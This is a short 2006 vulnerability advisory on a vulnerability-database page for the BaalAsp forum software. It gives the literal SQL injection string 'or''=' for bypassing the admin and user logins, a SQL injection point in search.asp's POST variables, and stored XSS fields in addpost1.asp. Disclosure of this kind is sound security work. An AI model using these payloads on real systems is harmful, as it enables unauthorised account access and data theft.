Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15116
HistoryNov 17, 2006 - 12:00 a.m.

BaalAsp forum [login bypass ,injections sql(post), xss(post)]

2006-11-1700:00:00
vulners.com
8

vendor site:http://baalasp.com/
product:BaalAsp forum
bug:login bypass, injection sql post, xss post
risk:high

authentification bypass :
admin login bypass ==> /adminlogin.asp
passwd: 'or''='
user login bypass ==> /userlogin.asp
user: 'or''='
passwd: 'or''='

injection sql (post)
==> /search.asp
variables : page=1&total=1&search='[sql]
or just post your query into the search engine

xss post :
/addpost1.asp?
vulnerables fields :

  • Subject:
  • Group Name:
  • Message:

laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: [email protected]